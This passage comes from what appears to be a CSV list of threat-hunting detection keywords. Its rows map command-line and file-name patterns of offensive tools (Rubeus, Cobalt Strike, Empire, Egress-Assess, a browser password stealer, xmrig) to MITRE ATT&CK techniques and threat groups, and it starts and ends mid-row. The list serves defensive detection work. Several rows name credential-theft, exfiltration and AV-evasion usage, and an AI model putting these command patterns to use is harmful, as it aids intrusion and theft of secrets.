Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cccam-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* certipy-ad*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* changepw * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* charlotte.cpp*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -* charlotte.dll *,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,0,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -* CharSubroutine-Macro.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -* -CheckShareAccess -Verbose*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -* --check-tor *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* -ChildPath *fodhelper.exe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -ChildPath *sdclt.exe*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-SDCLTBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* chimera.py *,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -* chimera.sh*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -* chimera_automation *.exe*,offensive_tool_keyword,Chimera,Automated DLL Sideloading Tool With EDR Evasion Capabilities,T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005,TA0005,N/A,N/A,Defense Evasion,https://github.com/georgesotiriadis/Chimera,1,0,N/A,9,3,280,41,2023-09-21T14:01:23Z,2023-05-15T13:02:54Z -* chrome logindata *,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* chrome masterkey 
*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -* chromium_based_browsers.py*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -* cics-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cics-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cics-user-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* cics-user-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* CIMplant.exe*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* citrix-brute-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-apps.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-apps-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-servers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* citrix-enum-servers-xml.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* clamav-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -client ftp -ip * -Username * -Password * -Datatype ssn -Size * -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -client http -ip * -Datatype cc -Size * -Port * -Loop * -Fast -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -client icmp -ip * -Datatype ssn -Report -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -client smb -ip * -Datatype *c:\*.* -Verbose*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation 
tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* -Client SMTPOutlook -IP * -NoPing -DataType *ssn*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* client.py -s http*:5000 --cert /*.pem*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -* clock-skew.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Clone_Token /Process:* /Command:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -* cloud_enum.py*,offensive_tool_keyword,cloud_enum,Multi-cloud OSINT tool. 
Enumerate public resources in AWS Azure and Google Cloud.,T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/initstring/cloud_enum,1,0,N/A,6,10,1238,199,2023-07-31T07:27:37Z,2019-05-31T09:14:05Z -* cloudsploit*,offensive_tool_keyword,cloudsploit,CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.,T1526 - T1534 - T1547 - T1078 - T1046,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/aquasecurity/cloudsploit,1,0,N/A,N/A,10,2921,641,2023-09-29T16:35:48Z,2015-06-29T15:33:40Z -* cmedb,offensive_tool_keyword,crackmapexec,windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* coap-resources.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -cobalt *,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,0,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -* cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 
- T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -* coerce * --dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* coerce -u * -p * --listener-ip*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* Coercer.py*,offensive_tool_keyword,Coercer,A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.,T1110 - T1021 - T1020,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/p0dalirius/Coercer,1,0,N/A,N/A,10,1359,152,2023-09-22T07:44:36Z,2022-06-30T16:52:33Z -* CoffeeExecuteFunction*,offensive_tool_keyword,cobaltstrike,Beacon Object File 
Loader,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cracked5pider/CoffeeLdr,1,0,N/A,10,10,230,31,2022-11-07T20:56:54Z,2022-07-18T15:21:11Z -* --coin *--nicehash *,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -* collect activedirectory --*,offensive_tool_keyword,adalanche,Active Directory ACL Visualizer and Explorer - who's really Domain Admin?,T1484 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/lkarlslund/Adalanche,1,0,N/A,N/A,10,1202,119,2023-06-20T13:02:30Z,2020-10-07T10:07:22Z -* --collectallproperties*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --CollectionMethod All *ldap*,offensive_tool_keyword,sharphound,C# 
Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* --CollectionMethod All *--ZipFileName *.zip*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,0,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -* -CollectionMethod All*loggedon*,offensive_tool_keyword,bloodhound,Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.,T1552 - T1027 - T1059 - T1087,TA0003 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -* -CollectionMethod LoggedOn -Verbose*,offensive_tool_keyword,bloodhound,Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.,T1552 - T1027 - T1059 - T1087,TA0003 - TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors,1,0,N/A,10,10,8799,1624,2023-10-03T06:49:04Z,2016-04-17T18:36:14Z -* -CollectionMethod stealth*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
